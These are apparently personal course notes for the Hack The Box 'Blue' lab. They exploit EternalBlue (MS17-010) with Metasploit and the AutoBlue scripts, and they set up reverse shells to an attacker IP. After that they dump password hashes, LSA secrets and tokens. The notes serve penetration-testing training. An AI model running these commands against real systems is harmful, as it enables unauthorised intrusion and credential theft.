TCM PEH Hacking Blue Notes

on under certs
1 minute read

HTB Blue

ms17-010 eternal blue
you’ll see this on penetration tests all the time internal to network
NOTE: EternalBlue can bring down the machine

nmap -A -T4 -p- 10.10.10.40
Noted 139 open
Noted 445 open
Noted Windows 7 SP1 <-------Always think EternalBlue


msfconsole
search ms17-010
Noted an auxiliary scanner for ms17_010
use auxiliary/scanner/smb/ms17_010_eternalblue
options
set rhost 10.10.10.40
options
exploit
Noted result “host is likely vulnerable”
use exploit/windows/smb/ms17_010_eternalblue
options
set rhost 10.10.10.40
show targets
exploit
NOTE: This exploit doesn’t always work the first time
Noted shell created
whoami
hostname
ctrl+c to trash shell back to metasploit


payloads
set payload windows/x64/meterpreter/reverse_tcp
options
exploit
Noted shell created
getuid
sysinfo
hashdump
shell
route print
arp -a
netstat -ao
ctrl+c to trash shell back to meterpreter
ps
Noted that this 4444 shell is an svchost.exe process
load kiwi
help
creds_all
lsa_dump_sam
lsa_dump_secrets
load incognito
list_tokens -u
exit to dump shell back to metasploit
exit to dump metasploit


Googled autoblue github
Noted result link at github
cd /opt
git clone https://github…com/3ndg4me/AutoBlue-MS17-010.git
cd AutoBlue*
ls
python eternalblue_checker.py 10.10.10.40
Noted result “target is not patched”
cd ./shellcode
./shell_prep.sh
y
10.10.14.24
4445
4448
0
0
cd …
ls
./listener_prep.sh
10.10.14.24
4445
4446
0
0
Noted metasploit multihandler opened
cd …
ls
python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
Noted session in metasploit multihandler
sessions 1
getuid
hostname

htb, certs
comments powered by Disqus